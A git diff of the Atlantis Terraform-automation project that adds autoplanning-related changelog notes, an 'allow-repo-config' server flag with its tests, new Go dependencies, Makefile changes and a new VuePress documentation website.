diff --git a/.circleci/config.yml b/.circleci/config.yml
index a632082603..50fb04e89c 100644
--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -3,7 +3,7 @@ jobs:
test:
working_directory: /go/src/github.com/runatlantis/atlantis
docker:
- - image: circleci/golang:1.10
+ - image: runatlantis/testing-env
steps:
- checkout
- run: make test-coverage
diff --git a/.gitignore b/.gitignore
index 4da26ca0b0..9e06e28b0a 100644
--- a/.gitignore
+++ b/.gitignore
@@ -8,3 +8,5 @@ website/src/public
.DS_Store
.cover
.terraform/
+node_modules/
+**/.vuepress/dist
diff --git a/CHANGELOG.md b/CHANGELOG.md
index 776ab26210..95db6b164e 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -1,3 +1,23 @@
+# v0.4.0-alpha
+
+## Features
+* Autoplanning - Atlantis will automatically run `plan` on new pull requests and
+when new commits are pushed to the pull request.
+* New repository `atlantis.yaml` format that supports:
+ * Arbitrary step ordering
+ * Single config file for whole repository
+ * Controlling autoplanning
+* Moved docs from the README to a standalone website.
+
+## Bugfixes
+
+## Backwards Incompatibilities / Notes:
+
+## Downloads
+
+## Docker
+
+
# v0.3.10
## Features
diff --git a/Gopkg.lock b/Gopkg.lock
index 8e3c34c6e2..7ae9566a29 100644
--- a/Gopkg.lock
+++ b/Gopkg.lock
@@ -1,6 +1,24 @@
# This file is autogenerated, do not edit; changes may be undone by the next 'dep ensure'.
+[[projects]]
+ name = "github.com/Masterminds/semver"
+ packages = ["."]
+ revision = "c7af12943936e8c39859482e61f0574c2fd7fc75"
+ version = "v1.4.2"
+
+[[projects]]
+ name = "github.com/Masterminds/sprig"
+ packages = ["."]
+ revision = "6b2a58267f6a8b1dc8e2eb5519b984008fa85e8c"
+ version = "v2.15.0"
+
+[[projects]]
+ name = "github.com/aokoli/goutils"
+ packages = ["."]
+ revision = "3391d3790d23d03408670993e957e8f408993c34"
+ version = "v1.0.1"
+
[[projects]]
name = "github.com/boltdb/bolt"
packages = ["."]
@@ -13,6 +31,18 @@
revision = "48dbb65d7bd5c74ab50d53d04c949f20e3d14944"
version = "1.0"
+[[projects]]
+ name = "github.com/davecgh/go-spew"
+ packages = ["spew"]
+ revision = "346938d642f2ec3594ed81d874461961cd0faa76"
+ version = "v1.1.0"
+
+[[projects]]
+ branch = "master"
+ name = "github.com/docker/docker"
+ packages = ["pkg/fileutils"]
+ revision = "e2593239d949eee454935daea7a5fe025477322f"
+
[[projects]]
branch = "master"
name = "github.com/elazarl/go-bindata-assetfs"
@@ -25,12 +55,30 @@
revision = "570b54cabe6b8eb0bc2dfce68d964677d63b5260"
version = "v1.5.0"
+[[projects]]
+ branch = "master"
+ name = "github.com/flynn-archive/go-shlex"
+ packages = ["."]
+ revision = "3f9db97f856818214da2e1057f8ad84803971cff"
+
[[projects]]
name = "github.com/fsnotify/fsnotify"
packages = ["."]
revision = "629574ca2a5df945712d3079857300b5e4da0236"
version = "v1.4.2"
+[[projects]]
+ name = "github.com/go-ozzo/ozzo-validation"
+ packages = ["."]
+ revision = "85dcd8368eba387e65a03488b003e233994e87e9"
+ version = "v3.3"
+
+[[projects]]
+ name = "github.com/go-test/deep"
+ packages = ["."]
+ revision = "6592d9cc0a499ad2d5f574fde80a2b5c5cc3b4f5"
+ version = "v1.0.1"
+
[[projects]]
branch = "master"
name = "github.com/google/go-github"
@@ -43,6 +91,12 @@
packages = ["query"]
revision = "53e6ce116135b80d037921a7fdd5138cf32d7a8a"
+[[projects]]
+ name = "github.com/google/uuid"
+ packages = ["."]
+ revision = "064e2069ce9c359c118179501254f67d7d37ba24"
+ version = "0.2"
+
[[projects]]
name = "github.com/gorilla/context"
packages = ["."]
@@ -89,6 +143,18 @@
]
revision = "68e816d1c783414e79bc65b3994d9ab6b0a722ab"
+[[projects]]
+ name = "github.com/huandu/xstrings"
+ packages = ["."]
+ revision = "2bf18b218c51864a87384c06996e40ff9dcff8e1"
+ version = "v1.0.0"
+
+[[projects]]
+ name = "github.com/imdario/mergo"
+ packages = ["."]
+ revision = "9316a62528ac99aaecb4e47eadd6dc8aa6533d58"
+ version = "v0.3.5"
+
[[projects]]
name = "github.com/inconshreveable/mousetrap"
packages = ["."]
@@ -182,6 +248,12 @@
revision = "645ef00459ed84a119197bfb8d8205042c6df63d"
version = "v0.8.0"
+[[projects]]
+ name = "github.com/sirupsen/logrus"
+ packages = ["."]
+ revision = "c155da19408a8799da419ed3eeb0cb5db0ad5dbc"
+ version = "v1.0.5"
+
[[projects]]
branch = "master"
name = "github.com/spf13/afero"
@@ -236,7 +308,11 @@
[[projects]]
branch = "master"
name = "golang.org/x/crypto"
- packages = ["ssh/terminal"]
+ packages = [
+ "pbkdf2",
+ "scrypt",
+ "ssh/terminal"
+ ]
revision = "7d9177d70076375b9a59c8fde23d52d9c4a7ecd5"
[[projects]]
@@ -276,6 +352,6 @@
[solve-meta]
analyzer-name = "dep"
analyzer-version = 1
- inputs-digest = "00be02ec7fa459d29d2f8b3ab70a8fdf7e6c1085f4a6fd53ab6db452e0ade9da"
+ inputs-digest = "0afba7ec3d45c8cf6aea549a9ff30c674c2106f10c8f2865aee452376dcbfbe6"
solver-name = "gps-cdcl"
solver-version = 1
diff --git a/Gopkg.toml b/Gopkg.toml
index 3e16969628..38b0857452 100644
--- a/Gopkg.toml
+++ b/Gopkg.toml
@@ -88,3 +88,15 @@
[[constraint]]
branch = "master"
name = "github.com/lkysow/go-gitlab"
+
+[[constraint]]
+ name = "github.com/go-test/deep"
+ version = "1.0.1"
+
+[[constraint]]
+ branch = "master"
+ name = "github.com/flynn-archive/go-shlex"
+
+[[constraint]]
+ branch = "master"
+ name = "github.com/docker/docker"
diff --git a/Makefile b/Makefile
index 442d4b90ee..b2d0129be6 100644
--- a/Makefile
+++ b/Makefile
@@ -28,13 +28,17 @@ build-service: ## Build the main Go service
go-generate: ## Run go generate in all packages
go generate $(PKG)
-regen-mocks: ## Delete all mocks and then run go generate to regen them
- find . -type f | grep mocks/mock | grep -v vendor | xargs rm
- @# not using $(PKG) here because that it includes directories that have now
- @# been deleted, causing go generate to fail.
- go generate $$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)
+#regen-mocks: ## Delete all mocks and matchers and then run go generate to regen them. This doesn't work anymore.
+#find . -type f | grep mocks/mock_ | grep -v vendor | xargs rm
+#find . -type f | grep mocks/matchers | grep -v vendor | xargs rm
+#@# not using $(PKG) here because it includes directories that have now
+#@# been deleted, causing go generate to fail.
+#echo "this doesn't work anymore: go generate \$\$(go list ./... | grep -v e2e | grep -v vendor | grep -v static)"
test: ## Run tests
+ @go test -short $(PKG)
+
+test-all: ## Run tests including integration
@go test $(PKG)
test-coverage:
@@ -78,9 +82,9 @@ end-to-end-tests: ## Run e2e tests
./scripts/e2e.sh
generate-website-html: ## Generate HTML for website
- cd website/src && hugo -d ../html
+ yarn website:build
upload-website-html: ## Upload generated website to s3
aws s3 rm s3://www.runatlantis.io/ --recursive
- aws s3 sync website/html/ s3://www.runatlantis.io/
- rm -rf website/html/
+ aws s3 sync runatlantis.io/.vuepress/dist/ s3://www.runatlantis.io/
+ rm -rf runatlantis.io/.vuepress/dist
diff --git a/README.md b/README.md
index 9397f7a77a..09ddd4f0c2 100644
--- a/README.md
+++ b/README.md
@@ -124,42 +124,42 @@ Atlantis supports several Terraform project structures:
```
.
├── project1
-│ ├── main.tf
+│ ├── main.tf
| └── ...
└── project2
- ├── main.tf
+ ├── main.tf
└── ...
```
- one folder per set of configuration
```
.
├── staging
-│ ├── main.tf
+│ ├── main.tf
| └── ...
└── production
- ├── main.tf
+ ├── main.tf
└── ...
```
- using `env/{env}.tfvars` to define workspace specific variables. This works in both multi-project repos and single-project repos.
```
.
├── env
-│ ├── production.tfvars
-│ └── staging.tfvars
+│ ├── production.tfvars
+│ └── staging.tfvars
└── main.tf
```
or
```
.
├── project1
-│ ├── env
-│ │ ├── production.tfvars
-│ │ └── staging.tfvars
-│ └── main.tf
+│ ├── env
+│ │ ├── production.tfvars
+│ │ └── staging.tfvars
+│ └── main.tf
└── project2
├── env
- │ ├── production.tfvars
- │ └── staging.tfvars
+ │ ├── production.tfvars
+ │ └── staging.tfvars
└── main.tf
```
With the above project structure you can de-duplicate your Terraform code between workspaces/environments without requiring extensive use of modules. At Hootsuite we found this project format to be very successful and use it in all of our 100+ Terraform repositories.
@@ -261,6 +261,8 @@ Once a plan is discarded, you'll need to run `plan` again prior to running `appl
If you'd like to require pull/merge requests to be approved prior to a user running `atlantis apply` simply run Atlantis with the `--require-approval` flag.
By default, no approval is required.
+Please note that this option is not intended for access control: anyone with read access to a repository can approve a pull request.
+
For more information on GitHub pull request reviews and approvals see: https://help.github.com/articles/about-pull-request-reviews/
For more information on GitLab merge request reviews and approvals (only supported on GitLab Enterprise) see: https://docs.gitlab.com/ee/user/project/merge_requests/merge_request_approvals.html.
@@ -382,6 +384,12 @@ $ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh
2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
```
+If you're using GitHub Enterprise, run:
+```
+$ atlantis server --atlantis-url $URL --gh-user $USERNAME --gh-token $TOKEN --gh-webhook-secret $SECRET --gh-hostname $GITHUBHOSTNAME
+2049/10/6 00:00:00 [WARN] server: Atlantis started - listening on port 4141
+```
+
If you're using GitLab, run:
```
$ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TOKEN --gitlab-webhook-secret $SECRET
@@ -392,6 +400,7 @@ $ atlantis server --atlantis-url $URL --gitlab-user $USERNAME --gitlab-token $TO
- `$USERNAME` is the GitHub/GitLab username you generated the token for
- `$TOKEN` is the access token you created. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_TOKEN` or `ATLANTIS_GITLAB_TOKEN`
- `$SECRET` is the random key you used for the webhook secret. If you left the secret blank then don't specify this flag. If you don't want this to be passed in as an argument for security reasons you can specify it in a config file (see [Configuration](#configuration)) or as an environment variable: `ATLANTIS_GH_WEBHOOK_SECRET` or `ATLANTIS_GITLAB_WEBHOOK_SECRET`
+- `$GITHUBHOSTNAME` is the FQDN of your GitHub Enterprise installation, for example `github.mycompany.com` (don't add a protocol before the FQDN; https is always used). To set it as an environment variable instead, use `ATLANTIS_GH_HOSTNAME`.
Atlantis is now running!
**We recommend running it under something like Systemd or Supervisord.**
diff --git a/cmd/server.go b/cmd/server.go
index 3fc9ff1aaf..67a37fa8ac 100644
--- a/cmd/server.go
+++ b/cmd/server.go
@@ -32,8 +32,9 @@ import (
// 3. Add your flag's description etc. to the stringFlags, intFlags, or boolFlags slices.
const (
// Flag names.
- AtlantisURLFlag = "atlantis-url"
AllowForkPRsFlag = "allow-fork-prs"
+ AllowRepoConfigFlag = "allow-repo-config"
+ AtlantisURLFlag = "atlantis-url"
ConfigFlag = "config"
DataDirFlag = "data-dir"
GHHostnameFlag = "gh-hostname"
@@ -142,6 +143,13 @@ var boolFlags = []boolFlag{
description: "Allow Atlantis to run on pull requests from forks. A security issue for public repos.",
defaultValue: false,
},
+ {
+ name: AllowRepoConfigFlag,
+ description: "Allow repositories to use atlantis.yaml files to customize the commands Atlantis runs." +
+ " Should only be enabled in a trusted environment since it enables a pull request to run arbitrary commands" +
+ " on the Atlantis server.",
+ defaultValue: false,
+ },
{
name: RequireApprovalFlag,
description: "Require pull requests to be \"Approved\" before allowing the apply command to be run.",
@@ -298,8 +306,9 @@ func (s *ServerCmd) run() error {
// Config looks good. Start the server.
server, err := s.ServerCreator.NewServer(userConfig, server.Config{
- AllowForkPRsFlag: AllowForkPRsFlag,
- AtlantisVersion: s.AtlantisVersion,
+ AllowForkPRsFlag: AllowForkPRsFlag,
+ AllowRepoConfigFlag: AllowRepoConfigFlag,
+ AtlantisVersion: s.AtlantisVersion,
})
if err != nil {
return errors.Wrap(err, "initializing server")
diff --git a/cmd/server_test.go b/cmd/server_test.go
index 4a41f72060..589dc6802b 100644
--- a/cmd/server_test.go
+++ b/cmd/server_test.go
@@ -278,6 +278,7 @@ func TestExecute_Defaults(t *testing.T) {
Ok(t, err)
Equals(t, "http://"+hostname+":4141", passedConfig.AtlantisURL)
Equals(t, false, passedConfig.AllowForkPRs)
+ Equals(t, false, passedConfig.AllowRepoConfig)
// Get our home dir since that's what gets defaulted to
dataDir, err := homedir.Expand("~/.atlantis")
@@ -361,6 +362,7 @@ func TestExecute_Flags(t *testing.T) {
c := setup(map[string]interface{}{
cmd.AtlantisURLFlag: "url",
cmd.AllowForkPRsFlag: true,
+ cmd.AllowRepoConfigFlag: true,
cmd.DataDirFlag: "/path",
cmd.GHHostnameFlag: "ghhostname",
cmd.GHTokenFlag: "token",
@@ -382,6 +384,7 @@ func TestExecute_Flags(t *testing.T) {
Equals(t, "url", passedConfig.AtlantisURL)
Equals(t, true, passedConfig.AllowForkPRs)
+ Equals(t, true, passedConfig.AllowRepoConfig)
Equals(t, "/path", passedConfig.DataDir)
Equals(t, "ghhostname", passedConfig.GithubHostname)
Equals(t, "token", passedConfig.GithubToken)
@@ -404,6 +407,7 @@ func TestExecute_ConfigFile(t *testing.T) {
tmpFile := tempFile(t, `---
atlantis-url: "url"
allow-fork-prs: true
+allow-repo-config: true
data-dir: "/path"
gh-hostname: "ghhostname"
gh-token: "token"
@@ -429,6 +433,7 @@ ssl-key-file: key-file
Ok(t, err)
Equals(t, "url", passedConfig.AtlantisURL)
Equals(t, true, passedConfig.AllowForkPRs)
+ Equals(t, true, passedConfig.AllowRepoConfig)
Equals(t, "/path", passedConfig.DataDir)
Equals(t, "ghhostname", passedConfig.GithubHostname)
Equals(t, "token", passedConfig.GithubToken)
@@ -451,6 +456,7 @@ func TestExecute_EnvironmentOverride(t *testing.T) {
tmpFile := tempFile(t, `---
atlantis-url: "url"
allow-fork-prs: true
+allow-repo-config: true
data-dir: "/path"
gh-hostname: "ghhostname"
gh-token: "token"
@@ -473,6 +479,7 @@ ssl-key-file: key-file
for name, value := range map[string]string{
"ATLANTIS_URL": "override-url",
"ALLOW_FORK_PRS": "false",
+ "ALLOW_REPO_CONFIG": "false",
"DATA_DIR": "/override-path",
"GH_HOSTNAME": "override-gh-hostname",
"GH_TOKEN": "override-gh-token",
@@ -498,6 +505,7 @@ ssl-key-file: key-file
Ok(t, err)
Equals(t, "override-url", passedConfig.AtlantisURL)
Equals(t, false, passedConfig.AllowForkPRs)
+ Equals(t, false, passedConfig.AllowRepoConfig)
Equals(t, "/override-path", passedConfig.DataDir)
Equals(t, "override-gh-hostname", passedConfig.GithubHostname)
Equals(t, "override-gh-token", passedConfig.GithubToken)
@@ -520,6 +528,7 @@ func TestExecute_FlagConfigOverride(t *testing.T) {
tmpFile := tempFile(t, `---
atlantis-url: "url"
allow-fork-prs: true
+allow-repo-config: true
data-dir: "/path"
gh-hostname: "ghhostname"
gh-token: "token"
@@ -541,6 +550,7 @@ ssl-key-file: key-file
c := setup(map[string]interface{}{
cmd.AtlantisURLFlag: "override-url",
cmd.AllowForkPRsFlag: false,
+ cmd.AllowRepoConfigFlag: false,
cmd.DataDirFlag: "/override-path",
cmd.GHHostnameFlag: "override-gh-hostname",
cmd.GHTokenFlag: "override-gh-token",
@@ -584,6 +594,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
for name, value := range map[string]string{
"ATLANTIS_URL": "url",
"ALLOW_FORK_PRS": "true",
+ "ALLOW_REPO_CONFIG": "true",
"DATA_DIR": "/path",
"GH_HOSTNAME": "gh-hostname",
"GH_TOKEN": "gh-token",
@@ -606,6 +617,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
c := setup(map[string]interface{}{
cmd.AtlantisURLFlag: "override-url",
cmd.AllowForkPRsFlag: false,
+ cmd.AllowRepoConfigFlag: false,
cmd.DataDirFlag: "/override-path",
cmd.GHHostnameFlag: "override-gh-hostname",
cmd.GHTokenFlag: "override-gh-token",
@@ -627,6 +639,7 @@ func TestExecute_FlagEnvVarOverride(t *testing.T) {
Equals(t, "override-url", passedConfig.AtlantisURL)
Equals(t, false, passedConfig.AllowForkPRs)
+ Equals(t, false, passedConfig.AllowRepoConfig)
Equals(t, "/override-path", passedConfig.DataDir)
Equals(t, "override-gh-hostname", passedConfig.GithubHostname)
Equals(t, "override-gh-token", passedConfig.GithubToken)
diff --git a/docs/atlantis-plan.gif b/docs/atlantis-plan.gif
deleted file mode 100644
index ec106133d9..0000000000
Binary files a/docs/atlantis-plan.gif and /dev/null differ
diff --git a/e2e/.gitconfig b/e2e/.gitconfig
index 43da800f32..3424a0e076 100644
--- a/e2e/.gitconfig
+++ b/e2e/.gitconfig
@@ -1,3 +1,3 @@
[user]
- name = Luke Kysow
+ name = atlantisbot
email = lkysow+atlantis@gmail.com
\ No newline at end of file
diff --git a/e2e/e2e.go b/e2e/e2e.go
index 041f240d7b..bf51830782 100644
--- a/e2e/e2e.go
+++ b/e2e/e2e.go
@@ -128,14 +128,7 @@ func (t *E2ETester) Start() (*E2EResult, error) {
// defer closing pull request and delete remote branch
defer cleanUp(t, pull.GetNumber(), branchName) // nolint: errcheck
- // create run plan comment
- log.Printf("creating plan comment: %q", t.projectType.PlanCommand)
- _, _, err = t.githubClient.client.Issues.CreateComment(t.githubClient.ctx, t.ownerName, t.repoName, pull.GetNumber(), &github.IssueComment{Body: github.String(t.projectType.PlanCommand)})
- if err != nil {
- return e2eResult, fmt.Errorf("error creating 'run plan' comment on github")
- }
-
- // wait for atlantis to respond to webhook
+ // wait for atlantis to respond to webhook and autoplan.
time.Sleep(2 * time.Second)
state := "not started"
diff --git a/e2e/main.go b/e2e/main.go
index 0f1e9f274a..8513032415 100644
--- a/e2e/main.go
+++ b/e2e/main.go
@@ -27,13 +27,12 @@ import (
var defaultAtlantisURL = "http://localhost:4141"
var projectTypes = []Project{
- {"standalone", "atlantis plan", "atlantis apply"},
- {"standalone-with-workspace", "atlantis plan -w staging", "atlantis apply -w staging"},
+ {"standalone", "atlantis apply -d standalone"},
+ {"standalone-with-workspace", "atlantis apply -d standalone-with-workspace -w staging"},
}
type Project struct {
Name string
- PlanCommand string
ApplyCommand string
}
diff --git a/package.json b/package.json
new file mode 100644
index 0000000000..a74a965486
--- /dev/null
+++ b/package.json
@@ -0,0 +1,9 @@
+{
+ "devDependencies": {
+ "vuepress": "^0.10.2"
+ },
+ "scripts": {
+ "website:dev": "vuepress dev runatlantis.io",
+ "website:build": "vuepress build runatlantis.io"
+ }
+}
diff --git a/runatlantis.io/.vuepress/components/HomeCustom.vue b/runatlantis.io/.vuepress/components/HomeCustom.vue
new file mode 100644
index 0000000000..fb7bf325ab
--- /dev/null
+++ b/runatlantis.io/.vuepress/components/HomeCustom.vue
@@ -0,0 +1,154 @@
+<template>
+  <div class="theme-container home-custom">
+    <div class="hero">
+      <img src="/hero.png" alt="Atlantis">
+      <h1>{{ data.heroText || $title || 'Hello' }}</h1>
+      <p class="description">{{ data.tagline || $description || 'Welcome to your VuePress site' }}</p>
+      <p class="action">
+        <a href="/guide/" class="action-button">Get Started →</a>
+      </p>
+    </div>
+    <div class="features">
+      <div class="feature">
+        <h2>What is it?</h2>
+        <p>A standalone application that listens for Terraform pull request events via webhooks. You deploy it yourself.</p>
+      </div>
+      <div class="feature">
+        <h2>What does it do?</h2>
+        <p>Runs <code>terraform plan</code> and <code>apply</code> remotely and comments back on the pull request with the output.</p>
+      </div>
+      <div class="feature">
+        <h2>Why should you use it?</h2>
+        <ul>
+          <li>Make Terraform changes visible to your whole team.</li>
+          <li>Enable non-operations engineers to collaborate on Terraform.</li>
+          <li>Standardize your Terraform workflows.</li>
+        </ul>
+      </div>
+    </div>
+  </div>
+</template>
\ No newline at end of file
diff --git a/runatlantis.io/.vuepress/config.js b/runatlantis.io/.vuepress/config.js
new file mode 100644
index 0000000000..552f878aaa
--- /dev/null
+++ b/runatlantis.io/.vuepress/config.js
@@ -0,0 +1,59 @@
+module.exports = {
+ title: 'Atlantis',
+ description: 'Terraform Automation By Pull Request',
+ head: [
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-196x196.png', sizes: '196x196' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-96x96.png', sizes: '96x96' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-32x32.png', sizes: '32x32' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-16x16.png', sizes: '16x16' }],
+ ['link', { rel: 'icon', type: 'image/png', href: 'favicon-128.png', sizes: '128x128' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '57x57', href: 'apple-touch-icon-57x57.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '114x114', href: 'apple-touch-icon-114x114.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '72x72', href: 'apple-touch-icon-72x72.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '144x144', href: 'apple-touch-icon-144x144.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '60x60', href: 'apple-touch-icon-60x60.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '120x120', href: 'apple-touch-icon-120x120.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '76x76', href: 'apple-touch-icon-76x76.png' }],
+ ['link', { rel: 'apple-touch-icon-precomposed', sizes: '152x152', href: 'apple-touch-icon-152x152.png' }],
+ ['meta', {name: 'msapplication-TileColor', content: '#FFFFFF' }],
+ ['meta', {name: 'msapplication-TileImage', content: 'mstile-144x144.png' }],
+ ['meta', {name: 'msapplication-square70x70logo', content: 'mstile-70x70.png' }],
+ ['meta', {name: 'msapplication-square150x150logo', content: 'mstile-150x150.png' }],
+ ['meta', {name: 'msapplication-wide310x150logo', content: 'mstile-310x150.png' }],
+ ['meta', {name: 'msapplication-square310x310logo', content: 'mstile-310x310.png' }],
+ ['link', { rel: 'stylesheet', sizes: '152x152', href: 'https://fonts.googleapis.com/css?family=Lato:400,900' }]
+ ],
+ themeConfig: {
+ nav: [
+ {text: 'Home', link: '/'},
+ {text: 'Guide', link: '/guide/'},
+ {text: 'Docs', link: '/docs/'},
+ {text: 'Blog', link: 'https://medium.com/runatlantis'}
+ ],
+ sidebar: {
+ '/docs/': [
+ '',
+ 'pull-request-commands',
+ 'deployment',
+ 'server-configuration',
+ 'apply-requirements',
+ 'locking',
+ 'autoplanning',
+ ['atlantis-yaml-reference', 'atlantis.yaml Reference'],
+ 'upgrading-atlantis-yaml-to-version-2',
+ 'security',
+ 'faq',
+ ],
+ '/guide/': [
+ '',
+ 'test-drive',
+ 'getting-started',
+ 'requirements',
+ 'atlantis-yaml-use-cases'
+ ]
+ },
+ repo: 'runatlantis/atlantis',
+ docsDir: 'runatlantis.io',
+ editLinks: true,
+ }
+}
\ No newline at end of file
diff --git a/runatlantis.io/.vuepress/override.styl b/runatlantis.io/.vuepress/override.styl
new file mode 100644
index 0000000000..deb097c9dc
--- /dev/null
+++ b/runatlantis.io/.vuepress/override.styl
@@ -0,0 +1,40 @@
+$accentColor = #0074db
+$textColor = #2c3e50
+$borderColor = #eaecef
+$codeBgColor = #282c34
+
+.theme-container.home-custom {
+ .hero {
+ h1 {
+ font-size: 64px
+ font-family: Lato, sans-serif
+ font-weight: 900
+ color: #222
+ }
+ img {
+ height: 200px
+ }
+ }
+ p.description {
+ position: relative
+ }
+ p.description:before {
+ position: absolute;
+ content: '';
+ width: 40px;
+ height: 3px;
+ top: -19px;
+ left: 50%;
+ margin-left: -20px;
+ background: #ff3366;
+ }
+ .feature {
+ h2 {
+ color: #222
+ }
+ p {
+ color: #222
+ }
+ }
+}
+
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png b/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png
new file mode 100644
index 0000000000..e5d8f68776
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-114x114.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png b/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png
new file mode 100644
index 0000000000..275239f5e1
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-120x120.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png b/runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png
new file mode 100644
index 0000000000..165e94d602
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-144x144.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png b/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png
new file mode 100644
index 0000000000..fdcae677fc
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-152x152.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png b/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png
new file mode 100644
index 0000000000..7bf1a37dc5
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-57x57.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png b/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png
new file mode 100644
index 0000000000..f60956692e
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-60x60.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png b/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png
new file mode 100644
index 0000000000..5bad7f3a86
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-72x72.png differ
diff --git a/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png b/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png
new file mode 100644
index 0000000000..0d98ab1ac5
Binary files /dev/null and b/runatlantis.io/.vuepress/public/apple-touch-icon-76x76.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-128.png b/runatlantis.io/.vuepress/public/favicon-128.png
new file mode 100644
index 0000000000..d9b35bcac4
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-128.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-16x16.png b/runatlantis.io/.vuepress/public/favicon-16x16.png
new file mode 100644
index 0000000000..d11d61369d
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-16x16.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-196x196.png b/runatlantis.io/.vuepress/public/favicon-196x196.png
new file mode 100644
index 0000000000..f0be80b94f
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-196x196.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-32x32.png b/runatlantis.io/.vuepress/public/favicon-32x32.png
new file mode 100644
index 0000000000..ffe16ae121
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-32x32.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon-96x96.png b/runatlantis.io/.vuepress/public/favicon-96x96.png
new file mode 100644
index 0000000000..2b5b78ab2b
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon-96x96.png differ
diff --git a/runatlantis.io/.vuepress/public/favicon.ico b/runatlantis.io/.vuepress/public/favicon.ico
new file mode 100644
index 0000000000..23dc683f76
Binary files /dev/null and b/runatlantis.io/.vuepress/public/favicon.ico differ
diff --git a/docs/atlantis-logo.png b/runatlantis.io/.vuepress/public/hero.png
similarity index 100%
rename from docs/atlantis-logo.png
rename to runatlantis.io/.vuepress/public/hero.png
diff --git a/runatlantis.io/.vuepress/public/mstile-144x144.png b/runatlantis.io/.vuepress/public/mstile-144x144.png
new file mode 100644
index 0000000000..165e94d602
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-144x144.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-150x150.png b/runatlantis.io/.vuepress/public/mstile-150x150.png
new file mode 100644
index 0000000000..138e1ae885
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-150x150.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-310x150.png b/runatlantis.io/.vuepress/public/mstile-310x150.png
new file mode 100644
index 0000000000..b276fac049
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-310x150.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-310x310.png b/runatlantis.io/.vuepress/public/mstile-310x310.png
new file mode 100644
index 0000000000..05687f3ec3
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-310x310.png differ
diff --git a/runatlantis.io/.vuepress/public/mstile-70x70.png b/runatlantis.io/.vuepress/public/mstile-70x70.png
new file mode 100644
index 0000000000..d9b35bcac4
Binary files /dev/null and b/runatlantis.io/.vuepress/public/mstile-70x70.png differ
diff --git a/runatlantis.io/README.md b/runatlantis.io/README.md
new file mode 100644
index 0000000000..3fdb030333
--- /dev/null
+++ b/runatlantis.io/README.md
@@ -0,0 +1,19 @@
+---
+layout: HomeCustom
+pageClass: home-custom
+heroImage: /hero.png
+heroText: Atlantis
+actionText: Get Started →
+actionLink: /guide/
+---
+
+## How it works
+* You deploy Atlantis internally. You don't have to give your cloud credentials to a third party.
+ * It runs as a golang binary or Docker container.
+* Expose it with a URL that is accessible by github/gitlab.com or your private git host.
+* Add its URL to your GitHub or GitLab repository so it can receive webhooks.
+* When a Terraform pull request is opened, Atlantis will run `terraform plan` and comment
+with the output back to the pull request.
+ * The exact `terraform plan` command is configurable.
+* If the `plan` looks good, users can comment on the pull request `atlantis apply` to apply the plan.
+  * You can require pull request approval before `apply` is allowed.
diff --git a/runatlantis.io/docs/README.md b/runatlantis.io/docs/README.md
new file mode 100644
index 0000000000..90952633b6
--- /dev/null
+++ b/runatlantis.io/docs/README.md
@@ -0,0 +1,18 @@
+# Overview
+
+This documentation is divided into sections:
